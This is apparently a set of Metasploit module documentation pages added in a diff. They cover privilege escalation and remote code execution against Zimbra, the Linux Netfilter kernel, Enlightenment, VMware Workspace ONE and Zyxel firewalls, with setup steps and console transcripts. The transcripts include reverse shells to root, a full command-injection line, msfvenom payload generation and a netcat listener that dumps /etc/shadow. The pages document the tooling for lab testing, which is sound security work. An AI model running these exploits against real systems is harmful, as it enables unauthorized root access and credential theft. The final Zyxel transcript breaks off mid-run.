+[*] Target filename: ../../../../../../../../../../../../opt/zimbra/jetty_base/webapps/zimbra/public/gauca.jsp
+[*] Sending POST request with ZIP file
+[*] Trying to trigger the backdoor @ public/gauca.jsp
+[-] Exploit aborted due to failure: unknown: Payload was not uploaded, the server probably isn't vulnerable
+[!] This exploit may require manual cleanup of '../../../../../../../../../../../../opt/zimbra/jetty_base/webapps/zimbra/public/gauca.jsp' on the target
+[*] Exploit completed, but no session was created.
+```
+
+### Zimbra Collaboration Suite Open Source Edition Patch 8.8.12 Patch 6 on Ubuntu 18.04
+
+Note: This version is not vulnerable, the open source edition doesn't have the correct path.
+
+```
+msf6 > use exploit/linux/http/zimbra_mboximport_cve_2022_27925
+[*] Using configured payload linux/x64/meterpreter/reverse_tcp
+msf6 exploit(linux/http/zimbra_mboximport_cve_2022_27925) > set RHOSTS 10.0.0.164
+RHOSTS => 10.0.0.164
+msf6 exploit(linux/http/zimbra_mboximport_cve_2022_27925) > set LHOST 10.0.0.146
+LHOST => 10.0.0.146
+msf6 exploit(linux/http/zimbra_mboximport_cve_2022_27925) > exploit
+
+[*] Started reverse TCP handler on 10.0.0.146:4444 
+[*] Encoding the payload as a .jsp file
+[*] Target filename: ../../../../../../../../../../../../opt/zimbra/jetty_base/webapps/zimbra/public/cualvccyq.jsp
+[*] Sending POST request with ZIP file
+[-] Exploit aborted due to failure: not-found: The target path was not found, target is probably not vulnerable
+[*] Exploit completed, but no session was created.
+```
@@ -0,0 +1,92 @@
+## Vulnerable Application
+
+This module exploits a symlink-based path traversal vulnerability in UnRAR 6.11 and earlier (open source version 6.1.6 and earlier) on Zimbra. You can get the vulnerable version of `unrar` here:
+
+* [Vulnerable unRAR version](https://www.rarlab.com/rar/rarlinux-x64-611.tar.gz)
+* [Github commit](https://github.com/pmachapman/unrar/commit/22b52431a0581ab5d687747b65662f825ec03946)
+
+Zimbra is the specific target, because certain Zimbra versions use `unrar` to scan incoming email. Specifically, the following versions of Zimbra, assuming the vulnerable version of `unrar` is installed, are affected:
+
+* Zimbra Collaboration 9.0.0 Patch 24 (and earlier)
+* Zimbra Collaboration 8.8.15 Patch 31 (and earlier)
+
+Installing the vulnerable versions of Zimbra is a pain, unfortunately. Currently, the following command works to downgrade Zimbra from the current version:
+
+```
+# apt-get install zimbra-patch=8.8.15.1651873147.p31.1-1.u18 zimbra-mta-patch=8.8.15.1651844231.p31.1-1.u18 zimbra-proxy-patch=8.8.15.1651844231.p31.1-1.u18
+# reboot
+```
+
+And to verify:
+
+```
+$ sudo -u zimbra /opt/zimbra/bin/zmcontrol -v
+Release 8.8.15.GA.3869.UBUNTU18.64 UBUNTU18_64 FOSS edition, Patch 8.8.15_P31.1.
+```
+
+Followed by specifically installing the vulnerable version of `unrar` linked above. Downpatching Zimbra like that is really finnicky, though, so that likely won't always work.
+
+## Verification Steps
+
+To exploit Zimbra, first load the module and generate the .rar file:
+
+```
+msf6 > use exploit/linux/http/zimbra_unrar_cve_2022_30333
+[*] Using configured payload linux/x64/meterpreter/reverse_tcp
+msf6 exploit(linux/http/zimbra_unrar_cve_2022_30333) > set LHOST 10.0.0.146
+LHOST => 10.0.0.146
+msf6 exploit(linux/http/zimbra_unrar_cve_2022_30333) > set RHOSTS 10.0.0.154
+RHOSTS => 10.0.0.154
+msf6 exploit(linux/http/zimbra_unrar_cve_2022_30333) > exploit
+
+[*] Started reverse TCP handler on 10.0.0.146:4444 
+[*] Encoding the payload as a .jsp file
+[*] Target filename: ../../../../../../../../../../../../opt/zimbra/jetty_base/webapps/zimbra/public/lnijw.jsp
+[+] payload.rar stored at /home/ron/.msf4/local/payload.rar
+[+] File created! Email the file above to any user on the target Zimbra server
+[*] Trying to trigger the backdoor @ public/lnijw.jsp...
+[*] Trying to trigger the backdoor @ public/lnijw.jsp...
+[...] waiting [...]
+```
+
+Then, email that file to any user (including a non-existent mailbox) on the Zimbra server. Once the payload arrives at Zimbra, Zimbra should try to extract it to check for malware with no user interaction. Metasploit should see the malicious file extracted and get a session:
+
+```
+[...]
+[*] Trying to trigger the backdoor @ public/lnijw.jsp...
+[*] Trying to trigger the backdoor @ public/lnijw.jsp...
+[*] Sending stage (3020772 bytes) to 10.0.0.154
+[+] Deleted ../../../../../../../../../../../../opt/zimbra/jetty_base/webapps/zimbra/public/lnijw.jsp
+[*] Meterpreter session 1 opened (10.0.0.146:4444 -> 10.0.0.154:39710) at 2022-07-27 13:18:03 -0700
+
+meterpreter > getuid
+Server username: zimbra
+```
+
+## Options
+
+### `FILENAME`
+
+The filename to generate - defaults to `payload.rar`, but can be changed on the filesystem or whatever.
+
+### `TARGET_PATH`
+
+The path (traversal included) where the payload will extract to. The default is the webroot, which is usually pretty safe.
+
+### `TARGET_FILENAME`
+
+The actual filename. It really should end with `.jsp`, otherwise it won't execute.
+
+By default, it's a random string with `.jsp` on the end. That should work fine, especially because we can't overwrite files and don't want to use the same payload name more than once.
+
+### `TRIGGER_PAYLOAD`
+
+A boolean, default `true`, that determines whether we use HTTP requests to trigger the .jsp payload. Set to `false` to trigger the payload manually.
+
+### `ListenerTimeout`
+
+The number of seconds to wait for a new session (default = `0`, or infinite).
+
+### `CheckInterval`
+
+The frequency with which to check for the payload on the server. Every `CheckInterval`, it performs an HTTP request to the payload path.
@@ -0,0 +1,149 @@
+## Vulnerable Application
+
+This module exploits a vulnerability in Netfilter, the Linux Kernel component
+that implements firewall capabilities in Linux.
+The vulnerability is a type-confusion bug that leads to a heap overflow in kernel memory.
+The exploit relies on spraying, it may fail, or crash the target system.
+
+### Install
+
+The vulnerability exists in linux kernel versions from `5.8-rc1` up to `v5.19-rc5`.
+this module contains offsets for some vulnerable Ubuntu versions.
+
+Install Ubuntu 22.04 LTS with a vulnerable kernel version.
+`apt-get install linux-image-5.15.0-25-generic`
+Hold shift when you reboot and select the proper kernel version
+
+## Verification Steps
+
+1. Make an Ubuntu target.
+1. Create a Meterpreter or shell payload and upload it to the Ubuntu target. Or setup openssh-server, and use the corresponding auxiliary module.
+1. Get a session
+1. Do: `use exploit/linux/local/netfilter_nft_set_elem_init_privesc`
+1. Do: `set session <session_id>`
+1. Do: `set payload <payload>`
+1. Do: `set lhost <ip>`
+1. Do: `set [r|l]port <port>`
+1. Do: `run`
+1. You should get a new session as the `root` user.
+1. If it fails, retry, or reboot Ubuntu and retry.
+
+## Options
+
+### COMPILE
+
+[Auto|True|False] This selects the binary to use. `True` will cause the module to upload the source
+code and perform compilation on target, `False` will cause the module to upload a precompiled binary.
+`Auto` will cause the module to try compiling the exploit on the target but will fall back to the
+precompiled option if a compiler cannot be found.
+
+### WritableDir
+
+This indicates the location where you would like the payload and exploit binary stored.
+The default value is `/tmp`
+
+Due to the exploitation strategy that this module relies on, `/tmp` must be writable, even if
+`WritableDir` is a different directory. `modprobe_path` gets overwritten with a path to a file
+in `/tmp`. This file is a bash script that adds the setuid bit to the payload uploaded at
+`WritableDir`.
+
+## Scenarios
+
+### Ubuntu 21.10 x64 With Linux 5.13.0.37-Generic
+
+```
+msf6 > use auxiliary/scanner/ssh/ssh_login
+msf6 auxiliary(scanner/ssh/ssh_login) > set rhosts 192.168.0.40
+rhosts => 192.168.0.40
+msf6 auxiliary(scanner/ssh/ssh_login) > set username redouane
+username => redouane
+msf6 auxiliary(scanner/ssh/ssh_login) > set password user
+password => user
+msf6 auxiliary(scanner/ssh/ssh_login) > run
+
+[*] 192.168.0.40:22 - Starting bruteforce
+[+] 192.168.0.40:22 - Success: 'redouane:user' 'uid=1000(redouane) gid=1000(redouane) groupes=1000(redouane),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),122(lpadmin),134(lxd),135(sambashare) Linux hopeful-zhukovky 5.15.0-25-generic #25-Ubuntu SMP Wed Mar 30 15:54:22 UTC 2022 x86_64 x86_64 x86_64 GNU/Linux '
+[*] SSH session 1 opened (192.168.0.32:46499 -> 192.168.0.40:22) at 2022-07-22 02:44:56 +0200
+[*] Scanned 1 of 1 hosts (100% complete)
+[*] Auxiliary module execution completed
+msf6 auxiliary(scanner/ssh/ssh_login) > use exploit/linux/local/netfilter_nft_set_elem_init_privesc
+[*] Using configured payload linux/x64/shell_reverse_tcp
+msf6 exploit(linux/local/netfilter_nft_set_elem_init_privesc) > set lhost wlan0
+lhost => wlan0
+msf6 exploit(linux/local/netfilter_nft_set_elem_init_privesc) > set session 1
+session => 1
+msf6 exploit(linux/local/netfilter_nft_set_elem_init_privesc) > run
+
+[!] SESSION may not be compatible with this module:
+[!]  * incompatible session architecture: 
+[*] Started reverse TCP handler on 192.168.0.32:4444 
+[*] Running automatic check ("set AutoCheck false" to disable)
+[+] The target appears to be vulnerable.
+[*] Dropping pre-compiled binaries to system...
+[*] Writing '/tmp/z9G2XJ' (761240 bytes) ...
+[*] Uploading payload...
+[*] Writing '/tmp/AsfKz' (248 bytes) ...
+[*] Running payload on remote system...
+[+] Deleted /tmp/z9G2XJ
+[+] Deleted /tmp/AsfKz
+[*] Command shell session 2 opened (192.168.0.32:4444 -> 192.168.0.40:35956) at 2022-07-22 02:45:54 +0200
+
+id
+[*] Payload executed! If it was successful, a session should have been created
+
+uid=0(root) gid=0(root) groups=0(root),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),122(lpadmin),134(lxd),135(sambashare),1000(redouane)
+```
+
+## Notes
+
+### Included Binaries
+The binary used by this exploit `data/exploits/CVE-2022-34918/ubuntu.elf` can be used separately from
+Metasploit. The binary takes a single argument which is the payload or executable you wish to launch as `root`.
+
+The exploit adds the setuid bit to the payload, the path given must be absolute, avoid binaries that don't run
+when the setuid bit is detected.
+
+Also, the exploit process forks, gets its child to execute the setuid payload binary, and exits
+(it doesn't call `wait` or `waitpid`). For this reason, don't expect the binary to read input from standard input.
+
+The following snippet shows an example of how one might run a payload to get
+a new Bash shell as the `root` user.
+
+```
+redouane@wizardly-maxwell:~$ id
+uid=1000(redouane) gid=1000(redouane) groups=1000(redouane),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),122(lpadmin),134(lxd),135(sambashare)
+redouane@wizardly-maxwell:~$ msfvenom -p linux/x64/shell_reverse_tcp LHOST=127.0.0.1 LPORT=1337 PrependSetresuid=true PrependSetresgid=true -f elf -o payload
+[-] No platform was selected, choosing Msf::Module::Platform::Linux from the payload
+[-] No arch selected, selecting arch: x64 from the payload
+No encoder specified, outputting raw payload
+Payload size: 96 bytes
+Final size of elf file: 216 bytes
+Saved as: payload
+redouane@wizardly-maxwell:~$ chmod +x payload
+redouane@wizardly-maxwell:~$ (echo id; head -n 2 /etc/shadow) | nc -lvvp1337 &
+[1] 2272
+redouane@wizardly-maxwell:~$ Listening on 0.0.0.0 1337
+
+redouane@wizardly-maxwell:~$ ./ubuntu.elf /home/redouane/payload
+[+] kernel version '5.15.0-25-generic #25-Ubuntu' detected
+[+] Second process currently waiting
+[+] Get CAP_NET_ADMIN capability
+[+] Netlink socket created
+[+] Netlink socket bound
+[+] Table table created
+[+] Set for the leak created
+[+] Set for write primitive created
+[*] Leak in process
+[+] Leak succeed
+[+] kaslr base found 0xffffffff9f000000
+[+] physmap base found 0xffff910a00000000
+[+] modprobe path changed !
+[+] Modprobe payload setup
+[?] waitpid
+[?] sem_post
+[+++] Got root shell, should exit?
+Connection received on localhost 56962
+uid=0(root) gid=0(root) groups=0(root),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),122(lpadmin),134(lxd),135(sambashare),1000(redouane)
+root:!:19193:0:99999:7:::
+daemon:*:19101:0:99999:7:::
+```
@@ -0,0 +1,124 @@
+## Vulnerable Application
+
+This module exploits a command injection within Enlightenment's
+`enlightenment_sys` binary. This is done by calling the mount
+command and feeding it paths which meet all of the system
+requirements, but execute a specific path as well due to a
+semi-colon being used.
+This module was tested on Ubuntu 22.04.1 X64 Desktop with
+enlightenment 0.25.3-1 (current at module write time)
+
+### Install
+
+At the time of writing, it was possible to `apt install enlightenment` to
+get a vulnerable version.
+
+### Main Command Explanation
+
+The main exploit command will look similar to the following (using `/tmp/exploit` as the payload path example):
+
+`/usr/lib/x86_64-linux-gnu/enlightenment/utils/enlightenment_sys /bin/mount -o noexec,nosuid,utf8,nodev,iocharset=utf8,utf8=0,utf8=1,uid=$(id -u), "/dev/../tmp/;/tmp/exploit" /tmp///net`
+
+This can be broken down in to several parts:
+
+1. `/usr/lib/x86_64-linux-gnu/enlightenment/utils/enlightenment_sys`
+2. `/bin/mount -o noexec,nosuid,utf8,nodev,iocharset=utf8,utf8=0,utf8=1,uid=$(id -u)`
+3. `"/dev/../tmp/;/tmp/exploit"`
+4. `/tmp///net`
+
+The first part calls the vulnerable executable which has `suid` set to root.
+
+The second portion is a standard mount, command. `enlightenment_sys` has a fork in the code
+for `mount`, which has the vulnerability in it.
+
+The third portion starts with `/dev/` to prevent the binary from exiting.  It is wrapped in
+double quotes, which are later removed by `enlightenment_sys` before running the command
+resulting in the command injection.
+
+Lastly `enlightenment_sys` checks that the last parameter is length 6, thus the extra `/`.
+It then calls `stat64` on `/tmp///net` and we pass that check.
+
+Now that all the checks have passed and the exploit code should go down the path to a `system`
+call. Again, the quotes are removed around `"/dev/../tmp/;/tmp/exploit"` , allowing for the `;`
+to be relevant and cause a command injection.
+
+## Verification Steps
+
+1. Install the application
+2. Start msfconsole
+3. Get a userland shell
+4. Do: `use exploits/linux/local/ubuntu_enlightenment_mount_priv_esc`
+5. Do: `set session #`
+6. Set payload and options for payload as needed
+7. Do: `run`
+8. You should get a root shell.
+
+## Options
+
+### WritableDir
+
+A directory which is writable to drop our payload in. Defaults to `/tmp`
+
+## Scenarios
+
+### Ubuntu 22.04.1 Desktop with Enlightenment 0.25.3-1
+
+Step 1, get a userland shell
+
+```
+resource (enlightenment.rb)> use auxiliary/scanner/ssh/ssh_login
+resource (enlightenment.rb)> set username ubuntu
+username => ubuntu
+resource (enlightenment.rb)> set password ubuntu
+password => ubuntu
+resource (enlightenment.rb)> set rhosts 192.168.2.31
+rhosts => 192.168.2.31
+resource (enlightenment.rb)> run
+[*] 192.168.2.31:22 - Starting bruteforce
+[+] 192.168.2.31:22 - Success: 'ubuntu:ubuntu' 'uid=1000(ubuntu) gid=1000(ubuntu) groups=1000(ubuntu),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),122(lpadmin),134(lxd),135(sambashare) Linux ubuntu2204desktop 5.15.0-43-generic #46-Ubuntu SMP Tue Jul 12 10:30:17 UTC 2022 x86_64 x86_64 x86_64 GNU/Linux '
+[*] SSH session 1 opened (192.168.2.199:35675 -> 192.168.2.31:22) at 2022-10-01 10:02:53 -0400
+[*] Scanned 1 of 1 hosts (100% complete)
+[*] Auxiliary module execution completed
+```
+
+Step 2, run exploit
+
+```
+resource (enlightenment.rb)> use exploits/linux/local/ubuntu_enlightenment_mount_priv_esc
+[*] No payload configured, defaulting to linux/x64/meterpreter/reverse_tcp
+resource (enlightenment.rb)> set session 1
+session => 1
+resource (enlightenment.rb)> set verbose true
+verbose => true
+msf6 exploit(linux/local/ubuntu_enlightenment_mount_priv_esc) > run
+
+[!] SESSION may not be compatible with this module:
+[!]  * incompatible session architecture: 
+[*] Started reverse TCP handler on 192.168.2.199:4444 
+[*] Running automatic check ("set AutoCheck false" to disable)
+[+] Found binary: /usr/lib/x86_64-linux-gnu/enlightenment/utils/enlightenment_sys
+[+] It's set for SUID
+[+] The target appears to be vulnerable.
+[*] Finding enlightenment_sys
+[+] Found binary: /usr/lib/x86_64-linux-gnu/enlightenment/utils/enlightenment_sys
+[+] It's set for SUID
+[*] Writing '/tmp/.7n09J2bt6' (250 bytes) ...
+[*] Max line length is 65537
+[*] Writing 250 bytes in 1 chunks of 735 bytes (octal-encoded), using printf
+[*] Creating folders for exploit
+[+] Found binary: /usr/lib/x86_64-linux-gnu/enlightenment/utils/enlightenment_sys
+[+] It's set for SUID
+[*] Launching exploit...
+[*] Transmitting intermediate stager...(126 bytes)
+[*] Sending stage (3045348 bytes) to 192.168.2.31
+[*] Meterpreter session 2 opened (192.168.2.199:4444 -> 192.168.2.31:54700) at 2022-10-01 10:03:12 -0400
+
+meterpreter > getuid
+Server username: root
+meterpreter > sysinfo
+Computer     : 192.168.2.31
+OS           : Ubuntu 22.04 (Linux 5.15.0-43-generic)
+Architecture : x64
+BuildTuple   : x86_64-linux-musl
+Meterpreter  : x64/linux
+```
@@ -0,0 +1,117 @@
+## Vulnerable Application
+VMware Workspace ONE Access contains a vulnerability whereby the horizon user can escalate their privileges to those of
+the root user by modifying a file and then restarting the vmware-certproxy service which invokes it. The service control
+is permitted via the sudo configuration without a password.
+
+### Setup
+
+To exploit this vulnerability in conjunction with CVE-2022-22954, follow [Installing and Configuring VMware Workspace
+ONE Access] or simply import the OVA into a **VMware hypervisor**. The target should be vulnerable to both
+vulnerabilities out of the box.
+
+The HW-150533, HW-154129, and HW-156875 patches may be optionally applied. In this case, a session will need to be
+opened by some means to the appliance as the `horizon` user in order to be exploitable. This is most easily accomplished
+by [resetting the root password], logging in locally, and then configuring SSH. Patches can be obtained from [VMware's
+Website]. Steps to reset the `root` password are available [here].
+
+[Installing and Configuring VMware Workspace ONE Access]: https://docs.vmware.com/en/VMware-Workspace-ONE-Access/21.08/workspace_one_access_install/GUID-0FABD001-050B-4A54-B100-2FA4E8F55613.html
+[VMware's Website]: https://customerconnect.vmware.com/en/downloads/details?downloadGroup=WS1A_ONPREM_210801&productId=1192&rPId=79985
+[resetting the root password]: https://kb.vmware.com/s/article/76530
+
+## Verification Steps
+
+1. Setup a vulnerable VMware instance (see the steps above).
+2. Start msfconsole.
+3. Obtain a session on the vulnerable instance.
+    * It is recommend to use either `exploit/linux/http/vmware_workspace_one_access_cve_2022_22954` if the target is
+      vulnerable to it or, alternatively, `exploit/multi/ssh/sshexec`.
+4. Do: `set SESSION -1`
+5. Optionally set the PAYLOAD and related options.
+6. Do: `run`
+7. If the target is vulnerable, the payload should be executed.
+
+## Options
+
+## Scenarios
+
+### VMware Workspace ONE Access 21.08.0.1
+In the following scenario, initial access is gained by first exploiting CVE-2022-22954. Once the session is opened, it
+is elevated to root by exploiting CVE-2022-31660.
+
+```
+msf6 exploit(linux/http/vmware_workspace_one_access_cve_2022_22954) > show options 
+
+Module options (exploit/linux/http/vmware_workspace_one_access_cve_2022_22954):
+
+   Name       Current Setting  Required  Description
+   ----       ---------------  --------  -----------
+   Proxies                     no        A proxy chain of format type:host:port[,type:host:port][...]
+   RHOSTS     192.168.159.98   yes       The target host(s), see https://github.com/rapid7/metasploit-framework/wiki/Using-Metasploit
+   RPORT      443              yes       The target port (TCP)
+   SRVHOST    0.0.0.0          yes       The local host or network interface to listen on. This must be an address on the local machine or 0.0.0.0 to listen on all addresses.
+   SRVPORT    8080             yes       The local port to listen on.
+   SSL        true             no        Negotiate SSL/TLS for outgoing connections
+   SSLCert                     no        Path to a custom SSL certificate (default is randomly generated)
+   TARGETURI  /                yes       Base path
+   URIPATH                     no        The URI to use for this exploit (default is random)
+
+
+Payload options (cmd/unix/python/meterpreter/reverse_tcp):
+
+   Name   Current Setting  Required  Description
+   ----   ---------------  --------  -----------
+   LHOST  192.168.159.128  yes       The listen address (an interface may be specified)
+   LPORT  4444             yes       The listen port
+
+
+Exploit target:
+
+   Id  Name
+   --  ----
+   0   Unix Command
+
+
+msf6 exploit(linux/http/vmware_workspace_one_access_cve_2022_22954) > exploit
+
+[*] Started reverse TCP handler on 192.168.159.128:4444 
+[*] Running automatic check ("set AutoCheck false" to disable)
+[+] The target is vulnerable.
+[*] Executing cmd/unix/python/meterpreter/reverse_tcp (Unix Command)
+[*] Sending stage (40132 bytes) to 192.168.159.98
+[*] Meterpreter session 1 opened (192.168.159.128:4444 -> 192.168.159.98:42312) at 2022-08-02 16:26:16 -0400
+
+meterpreter > sysinfo
+Computer        : photon-machine
+OS              : Linux 4.19.217-1.ph3 #1-photon SMP Thu Dec 2 02:29:27 UTC 2021
+Architecture    : x64
+System Language : en_US
+Meterpreter     : python/linux
+meterpreter > getuid
+Server username: horizon
+meterpreter > background 
+[*] Backgrounding session 1...
+msf6 exploit(linux/http/vmware_workspace_one_access_cve_2022_22954) > use exploit/linux/local/vmware_workspace_one_access_certproxy_lpe 
+[*] No payload configured, defaulting to cmd/unix/python/meterpreter/reverse_tcp
+msf6 exploit(linux/local/vmware_workspace_one_access_certproxy_lpe) > set SESSION -1
+SESSION => -1
+msf6 exploit(linux/local/vmware_workspace_one_access_certproxy_lpe) > run
+
+[*] Started reverse TCP handler on 192.168.250.134:4444 
+[*] Backing up the original file...
+[*] Writing '/opt/vmware/certproxy/bin/cert-proxy.sh' (601 bytes) ...
+[*] Triggering the payload...
+[*] Sending stage (40132 bytes) to 192.168.250.237
+[*] Meterpreter session 2 opened (192.168.250.134:4444 -> 192.168.250.237:63493) at 2022-08-02 16:26:57 -0400
+[*] Restoring file contents...
+[*] Restoring file permissions...
+
+meterpreter > getuid
+Server username: root
+meterpreter > sysinfo
+Computer        : photon-machine
+OS              : Linux 4.19.217-1.ph3 #1-photon SMP Thu Dec 2 02:29:27 UTC 2021
+Architecture    : x64
+System Language : en_US
+Meterpreter     : python/linux
+meterpreter > 
+```
@@ -0,0 +1,127 @@
+## Vulnerable Application
+
+Currently, as of 2022-10-14, all versions of Zimbra are vulnerable. Presumably
+they'll patch it eventually - I reported it to Zimbra.
+
+### Install Zimbra
+
+My steps to install Zimbra (adapted from Christophe):
+
+Create a VM with the following specs:
+
+```
+HDD = 128gb
+Memory/etc don't matter
+```
+
+Install a local DNS server (note: replace `<ip>` with the host's actual ip)
+(other note: replace `apt` with `yum` to do this on a Red Hat-derived system):
+
+```
+sudo apt update && sudo apt install dnsmasq
+sudo hostnamectl set-hostname mail.example.org
+echo "<ip> mail.example.org" | sudo tee -a /etc/hosts
+echo -e 'listen-address=127.0.0.1\nserver=8.8.8.8\ndomain=example.org\nmx-host=example.org, mail.example.org, 5\nmx-host=mail.example.org, mail.example.org, 5' | sudo tee /etc/dnsmasq.conf
+```
+
+Configure the host to use it:
+
+```
+sudo systemctl disable systemd-resolved
+sudo systemctl stop systemd-resolved
+sudo killall dnsmasq # Seems to be required for Red Hat OSes
+sudo systemctl restart dnsmasq
+echo "nameserver 127.0.0.1" | sudo tee /etc/resolv.conf
+```
+
+Download Zimbra from
+https://www.zimbra.com/downloads/zimbra-collaboration-open-source/ - you'll
+have to sell your soul and opt-in to spam, but they don't validate your email.
+
+```
+tar -xvvzf zcs-*.tgz
+cd zcs*
+sudo ./install.sh
+
+* Lots of <enter>
+* DO NOT install `dnscache` module (respond `N` when it ask), I had conflict issues with the local `dnsmasq`
+* Yes change the system
+* Setup the admin password, probably turn off auto-updates
+```
+
+## Verification Steps
+
+Get a Meterpreter session on the Zimbra server as the `zimbra` user - I used
+`exploit/linux/http/zimbra_cpio_cve_2022_41352` but just running a Meterpreter
+binary is also fine. To become vulnerable to cve-2022-41352, just `rm $(which pax)`
+then reboot.
+
+From there,
+
+You can obviously get a shell however you like. :)
+
+Then:
+
+1. Do: `use exploit/linux/local/zimbra_postfix_priv_esc`
+1. Do: `set SESSION 1`
+1. Do: `set RHOSTS <target>`
+1. Do: `set LHOST <listenerip>`
+1. Do: `exploit`
+
+## Options
+
+### SUDO_PATH
+
+The path to `sudo` on the host. If we have a proper environment with `$PATH`
+set, which we generally do, simply `sudo` is fine.
+
+### ZIMBRA_BASE
+
+The base where Zimbra is installed. Zimbra typically installs to `/opt/zimbra`,
+and I'm not even sure if it _can_ install elsewhere, so this default should be
+fine.
+
+### WritableDir
+
+A directory where we can write the payload - by default, `/tmp`.
+
+### PayloadFilename
+
+A specific filename to use as the payload, within `WritableDir`. By default,
+it's randomized (with a `.` in front)
+
+## Scenarios
+
+### Escalating a `zimbra` session to `root`, after exploiting cve-2022-41352
+
+```
+msf6 exploit(linux/http/zimbra_cpio_cve_2022_41352) > sessions -l
+
+Active sessions
+===============
+
+  Id  Name  Type                   Information                Connection
+  --  ----  ----                   -----------                ----------
+  1         meterpreter x64/linux  zimbra @ mail.example.org  172.16.166.147:4444 -> 172.16.166.157:47210 (172.16.166.157)
+
+msf6 exploit(linux/http/zimbra_cpio_cve_2022_41352) > use exploit/linux/local/zimbra_postfix_priv_esc
+[*] Using configured payload linux/x64/meterpreter/reverse_tcp
+msf6 exploit(linux/local/zimbra_postfix_priv_esc) > set SESSION 1
+SESSION => 1
+msf6 exploit(linux/local/zimbra_postfix_priv_esc) > exploit
+
+[*] Started reverse TCP handler on 172.16.166.147:4444 
+[*] Running automatic check ("set AutoCheck false" to disable)
+[*] Sending stage (3045348 bytes) to 172.16.166.157
+[*] Executing: sudo -n -l
+[+] The target appears to be vulnerable.
+[*] Creating exploit directory: /tmp/.GPjXSraCDY
+[*] Writing '/tmp/.GPjXSraCDY/.qjSY8' (250 bytes) ...
+[*] Attempting to trigger payload: sudo /opt/zimbra/common/sbin/postfix -D -v /tmp/.GPjXSraCDY/.qjSY8
+[*] Sending stage (3045348 bytes) to 172.16.166.157
+[+] Deleted /tmp/.GPjXSraCDY
+[*] Meterpreter session 5 opened (172.16.166.147:4444 -> 172.16.166.157:36488) at 2022-10-14 13:19:25 -0700
+
+meterpreter > getuid
+Server username: root
+```
@@ -0,0 +1,198 @@
+## Vulnerable Application
+
+### Description
+
+This module exploits CVE-2022-30526, a local privilege escalation vulnerability that
+allows a low privileged user (e.g. `nobody`) escalate to root. The issue stems from
+a suid binary that allows all users to copy files as `root`. This module overwrites
+the firewall's crontab to execute an attacker provided script, resulting in code
+execution as `root`.
+
+In order to use this module, the attacker must first establish shell access. For
+example, by exploiting CVE-2022-30525.
+
+Known affected Zyxel models are:
+
+* USG FLEX 50, 50W, 100W, 200, 500, 700
+* ATP 100, 200, 500, 700, 800
+* VPN 50, 100, 300, 1000
+* USG20-VPN and USG20W-VPN
+
+### Setup
+
+The vulnerable system is a hardware firewall/vpn that, to our knowledge,
+cannot be emulated. As such, testing requires a physical device. Once the
+device has been acquired, you'll need to accomplish the following:
+
+* Once powered on, register the device with Zyxel. You cannot do anything
+with the device until this is accomplished. Fortunately, the web interface
+will force you to complete this process. You'll need to create an account at
+https://portal.myzyxel.com and the firewall will need internet connectivity
+to complete the process.
+
+* Once the device is up to date, you'll need to downgrade the firmware. From
+portal.myzyxel.com you can download old firmware from:
+
+Devices Management -> Firmware Download
+
+From there you can select model and version to download. The last vulnerable
+version from the affected systems is 5.21 Patch 1.
+
+* Once you are using the vulnerable version, there is no special configuration
+you need to exploit from the LAN. If you want to exploit from the WAN, you'll
+need to enable "HTTP" and/or "HTTPS" through the firewall. From the web interface
+do:
+
+Configuration -> Objects -> Service -> Service Group -> Default_Allow_WAN_To_ZyWALL
+
+And move "HTTP" and/or "HTTPS" from the left column to the right. After applying
+the firewall should pass HTTP/HTTPS through the firewall to the web interface.
+
+* That's it. You are good to go.
+
+## Verification Steps
+
+* Follow setup steps above.
+* Establish a shell on the device. See `exploit/linux/http/zyxel_ztp_rce`
+* Do: `use exploit/linux/local/zyxel_suid_cp_lpe`
+* Do: `check`
+* Verify the remote host is exploitable
+* Do: `set LHOST <ip>`
+* Do: `run`
+* Verify the module acquires a root shell
+
+## Options
+
+## Scenarios
+
+### Successful escalation to root bash shell on USG Flex 100 using firmware 5.21
+
+```
+msf6 > use exploit/linux/http/zyxel_ztp_rce
+[*] Using configured payload cmd/unix/reverse_bash
+msf6 exploit(linux/http/zyxel_ztp_rce) > set RHOST 10.0.0.14
+RHOST => 10.0.0.14
+msf6 exploit(linux/http/zyxel_ztp_rce) > set LHOST 10.0.0.28
+LHOST => 10.0.0.28
+msf6 exploit(linux/http/zyxel_ztp_rce) > run
+
+[*] Started reverse TCP handler on 10.0.0.28:4444 
+[*] Running automatic check ("set AutoCheck false" to disable)
+[+] The target appears to be vulnerable. This was determined by the model and build date: USG FLEX 100, 220315042158
+[*] Executing Shell Dropper for cmd/unix/reverse_bash
+[*] Sending command to /ztp/cgi-bin/handler
+[*] Command shell session 1 opened (10.0.0.28:4444 -> 10.0.0.14:50827) at 2022-05-13 11:55:47 -0700
+[+] Command successfully executed.
+
+id
+uid=99(nobody) gid=10003(shadowr) groups=99,10003(shadowr)
+cat /zyinit/fwversion
+KERNEL_VERSION=3.10.87
+FIRMWARE_VER=5.21(ABUH.1)521-r103462-k3
+CAPWAP_VER=1.00.04
+COMPATIBLE_PRODUCT_MODEL_0=E15D
+COMPATIBLE_PRODUCT_MODEL_1=FFFF
+COMPATIBLE_PRODUCT_MODEL_2=FFFF
+COMPATIBLE_PRODUCT_MODEL_3=FFFF
+COMPATIBLE_PRODUCT_MODEL_4=FFFF
+MODEL_ID=USG FLEX 100
+KERNEL_BUILD_DATE=2022-03-15 03:18:23
+BUILD_DATE=2022-03-15 05:14:23
+FSH_VER=1.0.0
+^Z
+Background session 1? [y/N]  y
+msf6 exploit(linux/http/zyxel_ztp_rce) > use exploit/linux/local/zyxel_suid_cp_lpe
+[*] Using configured payload cmd/unix/reverse_bash
+msf6 exploit(linux/local/zyxel_suid_cp_lpe) > set LHOST 10.0.0.28
+LHOST => 10.0.0.28
+msf6 exploit(linux/local/zyxel_suid_cp_lpe) > set session 1
+session => 1
+msf6 exploit(linux/local/zyxel_suid_cp_lpe) > run
+
+[*] Started reverse TCP handler on 10.0.0.28:4444 
+[*] Running automatic check ("set AutoCheck false" to disable)
+[+] The target is vulnerable. System version: USG FLEX 100, 5.21(ABUH.1)521-r103462-k3
+[*] Executing Unix Command for cmd/unix/reverse_bash
+[*] Overwriting /var/zyxel/crontab
+[*] The payload may take up to 60 seconds to be executed by cron
+[+] Deleted /tmp/bJUQqm
+[*] Resetting crontab to the original version
+[+] Deleted /tmp/IcNlzvnv5
